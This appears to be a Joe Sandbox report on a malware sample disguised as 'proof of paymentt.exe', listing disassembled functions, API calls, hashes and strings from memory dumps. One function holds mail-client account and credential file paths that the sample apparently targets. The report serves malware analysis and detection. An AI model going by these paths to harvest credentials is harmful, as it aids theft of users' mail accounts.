Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

Uniqueness

Uniqueness Score: -1.00%

Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
__freea.LIBCMT ref: 10008A08

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

__freea.LIBCMT ref: 10008A11
__freea.LIBCMT ref: 10008A36

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001607
_strcat.LIBCMT ref: 1000161D
lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
lstrcatW.KERNEL32(?,?), ref: 1000165A
lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
lstrcatW.KERNEL32(00001008,?), ref: 10001686

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrcatlstrlen$_strcat_strlen
String ID:
API String ID: 1922816806-0
Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 10001038
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrlen$AttributesFilelstrcat
String ID:
API String ID: 3594823470-0
Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300

Uniqueness

Uniqueness Score: -1.00%

Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
_free.LIBCMT ref: 10005B2D
_free.LIBCMT ref: 10005B55
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
_abort.LIBCMT ref: 10005B74

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174

Uniqueness

Uniqueness Score: -1.00%

Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A

Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869

Strings

\Storage\, xrefs: 10001246
\Mail\, xrefs: 1000126D
\Data\AccCfg\Accounts.tdat, xrefs: 1000120E
\Accounts\Account.rec0, xrefs: 1000125A

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrlen$_strlenlstrcat$AttributesFile
String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
API String ID: 4036392271-1520055953
Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758

Uniqueness

Uniqueness Score: -1.00%

Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F

Strings

mscoree.dll, xrefs: 10004B52
CorExitProcess, xrefs: 10004B64

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 1000715C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
_free.LIBCMT ref: 100071B8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0

Uniqueness

Uniqueness Score: -1.00%

Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
_free.LIBCMT ref: 10005BB4
_free.LIBCMT ref: 10005BDB
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164

Uniqueness

Uniqueness Score: -1.00%

Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
lstrcatW.KERNEL32(?,?), ref: 10001EAC
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5

Uniqueness

Uniqueness Score: -1.00%

Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100091D0

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100091E2
_free.LIBCMT ref: 100091F4
_free.LIBCMT ref: 10009206
_free.LIBCMT ref: 10009218

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64

Uniqueness

Uniqueness Score: -1.00%

Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000536F

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10005381
_free.LIBCMT ref: 10005394
_free.LIBCMT ref: 100053A5
_free.LIBCMT ref: 100053B6

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84

Uniqueness

Uniqueness Score: -1.00%

Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\proof of paymentt.exe,00000104), ref: 10004C1D
_free.LIBCMT ref: 10004CE8
_free.LIBCMT ref: 10004CF2

Strings

C:\Users\user\Desktop\proof of paymentt.exe, xrefs: 10004C14, 10004C1B, 10004C4A, 10004C82

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\proof of paymentt.exe
API String ID: 2506810119-1240230690
Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
__freea.LIBCMT ref: 100087D5

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000655C

Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7

Strings

., xrefs: 10006713
*?, xrefs: 10006433

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50

Uniqueness

Uniqueness Score: -1.00%

Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001719

Strings

Se., xrefs: 100016E5
: , xrefs: 100016B3

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _strlen
String ID: : $Se.
API String ID: 4218353326-4089948878
Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765

Uniqueness

Uniqueness Score: -1.00%

Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 10002903

Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632

__CxxThrowException@8.LIBVCRUNTIME ref: 10002920

Strings

Unknown exception, xrefs: 1000292D

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mQpdTSxCjbPop.exePID: 4304, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	314
Total number of Limit Nodes:	15

Executed Functions

Function 07330D80 Relevance: 5.6, Strings: 4, Instructions: 564
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

